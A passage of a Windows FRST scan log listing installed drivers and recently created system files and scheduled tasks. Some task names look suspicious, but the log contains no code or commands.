Instruments Corporation) S3 niorbk; C:\WINDOWS\System32\drivers\niorbkl.sys [31224 2018-09-14] (National Instruments Corporation -> National Instruments Corporation) S3 nipalfwedl; C:\WINDOWS\System32\drivers\nipalfwedl.sys [31312 2018-09-13] (National Instruments Corporation -> National Instruments Corporation) R0 NIPALK; C:\WINDOWS\System32\drivers\nipalk.sys [797696 2018-09-13] (National Instruments Corporation -> National Instruments Corporation) S3 nipalusbedl; C:\WINDOWS\System32\drivers\nipalusbedl.sys [31304 2018-09-13] (National Instruments Corporation -> National Instruments Corporation) R0 nipbcfk; C:\WINDOWS\System32\drivers\nipbcfk.sys [19288 2018-09-08] (National Instruments Corporation -> National Instruments Corporation) R0 nipcibrd; C:\WINDOWS\System32\drivers\nipcibrd.sys [135728 2018-09-19] (National Instruments Corporation -> National Instruments Corporation) R0 nipxibrc; C:\WINDOWS\System32\drivers\nipxibrc.sys [83736 2018-09-25] (National Instruments Corporation -> National Instruments Corporation) S3 nipxifpk; C:\WINDOWS\System32\drivers\nipxifpk.sys [50920 2018-07-19] (National Instruments Corporation -> National Instruments Corporation) S3 nipxigpk; C:\WINDOWS\System32\drivers\nipxigpk.sys [40544 2018-07-19] (National Instruments Corporation -> National Instruments Corporation) R2 nipxirmk; C:\WINDOWS\System32\drivers\nipxirmkl.sys [31224 2018-09-18] (National Instruments Corporation -> National Instruments Corporation) S3 niraptrk; C:\WINDOWS\System32\drivers\niraptrkl.sys [30784 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 niscdk; C:\WINDOWS\System32\drivers\niscdkl.sys [30888 2017-05-15] (National Instruments Corporation -> National Instruments Corporation) S3 nisdigk; C:\WINDOWS\System32\drivers\nisdigkl.sys [30824 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nisftk; C:\WINDOWS\System32\drivers\nisftkl.sys [15184 2015-01-27] (National Instruments Corporation -> National Instruments Corporation) S3 nispdk; C:\WINDOWS\System32\drivers\nispdkl.sys [30888 2017-05-15] (National Instruments Corporation -> National Instruments Corporation) S3 nissrk; C:\WINDOWS\System32\drivers\nissrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nistc2k; C:\WINDOWS\System32\drivers\nistc2kl.sys [30760 2017-05-12] (National Instruments Corporation -> National Instruments Corporation) S3 nistc3rk; C:\WINDOWS\System32\drivers\nistc3rkl.sys [30776 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nistcrk; C:\WINDOWS\System32\drivers\nistcrkl.sys [30848 2017-05-17] (National Instruments Corporation -> National Instruments Corporation) R2 nistreamk; C:\WINDOWS\System32\drivers\nistreamkl.sys [44680 2017-03-16] (National Instruments Corporation -> National Instruments Corporation) S3 niswdk; C:\WINDOWS\System32\drivers\niswdkl.sys [15176 2017-03-24] (National Instruments Corporation -> National Instruments Corporation) S3 nitfurk; C:\WINDOWS\System32\drivers\nitfurkl.sys [30888 2017-05-17] (National Instruments Corporation -> National Instruments Corporation) S3 nitiork; C:\WINDOWS\System32\drivers\nitiorkl.sys [30856 2017-06-26] (National Instruments Corporation -> National Instruments Corporation) S3 niufurk; C:\WINDOWS\System32\drivers\niufurkl.sys [30848 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 NiViPciK; C:\WINDOWS\System32\drivers\NiViPciKl.sys [31448 2018-09-25] (National Instruments Corporation -> National Instruments Corporation) S3 niwfrk; C:\WINDOWS\System32\drivers\niwfrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R3 niwsk; C:\WINDOWS\system32\DRIVERS\niwsk.sys [147144 2016-10-12] (National Instruments Corporation -> National Instruments Corporation) S3 nixfmrrk; C:\WINDOWS\System32\drivers\nixfmrrkl.sys [30800 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) S3 nixsrk; C:\WINDOWS\System32\drivers\nixsrkl.sys [30792 2017-12-04] (National Instruments Corporation -> National Instruments Corporation) R1 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [83776 2019-05-11] (Insecure.Com LLC -> Insecure.Com LLC.) S4 npcap_wifi; C:\WINDOWS\system32\DRIVERS\npcap.sys [83776 2019-05-11] (Insecure.Com LLC -> Insecure.Com LLC.) R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.) S3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [711968 2019-06-04] (Realtek Semiconductor Corp. -> Realtek ) R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [52904 2016-04-28] (Synaptics Incorporated -> Synaptics Incorporated) R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 usbcamcl; C:\WINDOWS\System32\DRIVERS\usbcamcl.sys [50664 2011-08-18] (Ark Pioneer Microelectronics (Shenzhen) Co., Ltd. -> usb camera) R3 USBPcap; C:\WINDOWS\system32\DRIVERS\USBPcap.sys [50224 2017-08-21] (Tomasz Moń -> USBPcap) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46472 2019-03-19] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [333784 2019-03-19] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [62432 2019-03-19] (Microsoft Windows -> Microsoft Corporation) R3 WinDriver6; C:\WINDOWS\system32\drivers\windrvr6.sys [254976 2013-10-14] (Jungo LTD -> Jungo) R3 WirelessButtonDriver64; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [34944 2018-05-11] (HP Inc. -> HP) R2 XilinxPC4Driver; C:\WINDOWS\System32\drivers\xpc4drvr.sys [27384 2013-10-14] (Xilinx -> Xilinx, Inc.) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Three months (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-07-04 23:01 - 2019-07-04 23:10 - 000231224 _____ C:\Users\virk_ps\Downloads\Addition.txt 2019-07-04 22:57 - 2019-07-04 23:39 - 000059257 _____ C:\Users\virk_ps\Downloads\FRST.txt 2019-07-04 22:55 - 2019-07-04 23:37 - 000000000 ____D C:\FRST 2019-07-04 22:54 - 2019-07-04 22:54 - 002420224 _____ (Farbar) C:\Users\virk_ps\Downloads\FRST64.exe 2019-07-04 22:04 - 2019-07-04 22:04 - 000000226 _____ C:\WINDOWS\pxisys.ini 2019-07-04 22:04 - 2019-07-04 22:04 - 000000217 _____ C:\WINDOWS\pxiesys.ini 2019-07-04 21:11 - 2019-07-04 21:11 - 000000000 ____D C:\ProgramData\Microsoft OneDrive 2019-07-04 21:08 - 2019-07-04 21:08 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Adobe 2019-07-04 21:07 - 2019-07-04 21:07 - 000000432 __RSH C:\Users\virk_ps\ntuser.pol 2019-07-04 21:07 - 2019-07-04 21:07 - 000000020 ___SH C:\Users\virk_ps\ntuser.ini 2019-07-04 21:05 - 2019-07-04 22:01 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2019-07-04 21:05 - 2019-07-04 21:06 - 000003446 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2019-07-04 21:05 - 2019-07-04 21:06 - 000003344 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2019-07-04 21:05 - 2019-07-04 21:06 - 000002794 _____ C:\WINDOWS\System32\Tasks\AdobeGCInvoker-1.0-PSV-virk_ps 2019-07-04 21:05 - 2019-07-04 21:06 - 000002456 _____ C:\WINDOWS\System32\Tasks\NIUpdateServiceCheckTask 2019-07-04 21:05 - 2019-07-04 21:06 - 000002310 _____ C:\WINDOWS\System32\Tasks\Adobe Uninstaller 2019-07-04 21:05 - 2019-07-04 21:05 - 000003758 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier 2019-07-04 21:05 - 2019-07-04 21:05 - 000003388 _____ C:\WINDOWS\System32\Tasks\JKIUpdateTask 2019-07-04 21:05 - 2019-07-04 21:05 - 000003244 _____ C:\WINDOWS\System32\Tasks\MATLAB R2016a Startup Accelerator 2019-07-04 21:05 - 2019-07-04 21:05 - 000003120 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2019-07-04 21:05 - 2019-07-04 21:05 - 000003078 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{DB952372-1EAA-4A8C-A656-6CB79B54A6F9} 2019-07-04 21:05 - 2019-07-04 21:05 - 000002940 _____ C:\WINDOWS\System32\Tasks\TdTMOZLIgCBDHq 2019-07-04 21:05 - 2019-07-04 21:05 - 000002850 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-961552698-412199883-319453439-1001 2019-07-04 21:05 - 2019-07-04 21:05 - 000002806 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-961552698-412199883-319453439-1001 2019-07-04 21:05 - 2019-07-04 21:05 - 000002802 _____ C:\WINDOWS\System32\Tasks\MySQLNotifierTask 2019-07-04 21:05 - 2019-07-04 21:05 - 000002740 _____ C:\WINDOWS\System32\Tasks\ZjcKAahBLSqdO2 2019-07-04 21:05 - 2019-07-04 21:05 - 000002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS 2019-07-04 21:05 - 2019-07-04 21:05 - 000002730 _____ C:\WINDOWS\System32\Tasks\NyepAIDvKQYBHlkRx2 2019-07-04 21:05 - 2019-07-04 21:05 - 000002722 _____ C:\WINDOWS\System32\Tasks\atjcrjesXItFrEqGbjE2 2019-07-04 21:05 - 2019-07-04 21:05 - 000002712 _____ C:\WINDOWS\System32\Tasks\{02D17E98-9843-84D7-912D-69D8A69DE031} 2019-07-04 21:05 - 2019-07-04 21:05 - 000002708 _____ C:\WINDOWS\System32\Tasks\{20613B30-4BE6-9A2E-4F07-54987EEE6FCA} 2019-07-04 21:05 - 2019-07-04 21:05 - 000002704 _____ C:\WINDOWS\System32\Tasks\NuWcWvyREcjfkrP2 2019-07-04 21:05 - 2019-07-04 21:05 - 000002660 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon 2019-07-04 21:05 - 2019-07-04 21:05 - 000002648 _____ C:\WINDOWS\System32\Tasks\PPI Update 2019-07-04 21:05 - 2019-07-04 21:05 - 000002646 _____ C:\WINDOWS\System32\Tasks\McAfee Remediation (Prepare) 2019-07-04 21:05 - 2019-07-04 21:05 - 000002644 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate 2019-07-04 21:05 - 2019-07-04 21:05 - 000002612 _____ C:\WINDOWS\System32\Tasks\Sk2545Pl 2019-07-04 21:05 - 2019-07-04 21:05 - 000002500 _____ C:\WINDOWS\System32\Tasks\NIUpdateServiceStartupTask 2019-07-04 21:05 - 2019-07-04 21:05 - 000002486 _____ C:\WINDOWS\System32\Tasks\NI OPC Servers 2016 2019-07-04 21:05 - 2019-07-04 21:05 - 000002366 _____ C:\WINDOWS\System32\Tasks\csrss 2019-07-04 21:05 - 2019-07-04 21:05 - 000002310 _____ C:\WINDOWS\System32\Tasks\RtHDVBg 2019-07-04 21:05 - 2019-07-04 21:05 - 000002282 _____ C:\WINDOWS\System32\Tasks\RTKCPL 2019-07-04 21:05 - 2019-07-04 21:05 - 000002156 _____ C:\WINDOWS\System32\Tasks\npcapwatchdog 2019-07-04 21:05 - 2019-07-04 21:05 - 000002048 _____ C:\WINDOWS\System32\Tasks\Synaptics TouchPad Enhancements 2019-07-04 21:05 - 2019-07-04 21:05 - 000000000 ____D C:\WINDOWS\System32\Tasks\WPD 2019-07-04 21:05 - 2019-07-04 21:05 - 000000000 ____D C:\WINDOWS\System32\Tasks\MySQL 2019-07-04 21:05 - 2019-07-04 21:05 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee 2019-07-04 21:03 - 2019-07-04 21:05 - 000015243 _____ C:\WINDOWS\diagwrn.xml 2019-07-04 21:03 - 2019-07-04 21:05 - 000015243 _____ C:\WINDOWS\diagerr.xml 2019-07-04 20:51 - 2019-07-04 22:06 - 000795988 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2019-07-04 20:39 - 2019-07-04 20:39 - 000000000 ____D C:\ProgramData\USOShared 2019-07-04 20:38 - 2019-06-12 07:00 - 002874368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2019-07-04 20:38 - 2016-05-03 23:30 - 000081416 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2019-07-04 20:34 - 2019-07-04 20:44 - 000634856 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2019-07-04 20:34 - 2019-07-04 20:37 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2019-07-04 20:31 - 2019-07-04 21:07 - 000000000 ____D C:\Windows.old 2019-07-04 19:38 - 2019-07-04 20:32 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate 2019-07-04 19:37 - 2019-07-04 21:07 - 000000000 ____D C:\Users\virk_ps 2019-07-04 19:37 - 2019-03-19 10:16 - 000001105 _____ C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2019-07-04 19:35 - 2019-07-04 20:40 - 000000000 ____D C:\WINDOWS\ServiceProfiles 2019-07-04 19:27 - 2019-07-04 19:27 - 025902080 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 025444864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 022625792 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 019849216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 019810816 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 018017792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 007757312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 007175168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 006218752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 005919744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 005500416 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 004578816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 004481536 _____ (Microsoft Corporation) C:\WINDOWS\system32\DHolographicDisplay.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 004348408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 004306432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 004129416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 003525592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 003487232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 003243080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002956984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb 2019-07-04 19:27 - 2019-07-04 19:27 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb 2019-07-04 19:27 - 2019-07-04 19:27 - 002494232 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002398208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002235936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002216448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002190648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 002072152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001866064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001715216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001611576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001608192 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001555688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001501496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001391416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 001383736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001319936 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001273176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001214976 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001192096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001124864 _____ (Microsoft Corporation) C:\WINDOWS\system32\CBDHSvc.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001071928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 001043768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPolicy.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001012792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 001000960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.Internal.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000957240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVManifest.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000923136 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000833536 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000827192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000816440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000801592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys 2019-07-04 19:27 - 2019-07-04 19:27 - 000781912 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000741176 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVReporting.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000700928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000665912 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000649016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000568336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000516752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000510768 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2019-07-04 19:27 - 2019-07-04 19:27 - 000494904 _____ (Microsoft Corporation) C:\WINDOWS\system32\TransportDSA.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000460288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcSpecfc.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2019-07-04 19:27 - 2019-07-04 19:27 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\DispBroker.Desktop.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000394040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\provplatformdesktop.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000382976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000366184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000363008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000357376 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000307200 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000300392 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscobj.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000294400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_AnalogShell.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000267528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000257848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVFileSystemMetadata.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\provplatformdesktop.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000231432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVShNotify.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000228664 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamMap.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000210232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cscobj.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000202552 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamingUX.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000183808 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngOnline.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000181560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVDllSurrogate.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000172856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVNice.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwclientres.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000129088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000099712 _____ (Microsoft Corporation) C:\WINDOWS\system32\FsIso.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000093496 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000093312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpfve.sys 2019-07-04 19:27 - 2019-07-04 19:27 - 000090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\srmlib.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000084280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys 2019-07-04 19:27 - 2019-07-04 19:27 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveskybackup.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000058825 _____ C:\WINDOWS\system32\srms.dat 2019-07-04 19:27 - 2019-07-04 19:27 - 000053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\BdeUISrv.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000042296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000037904 _____ (Microsoft 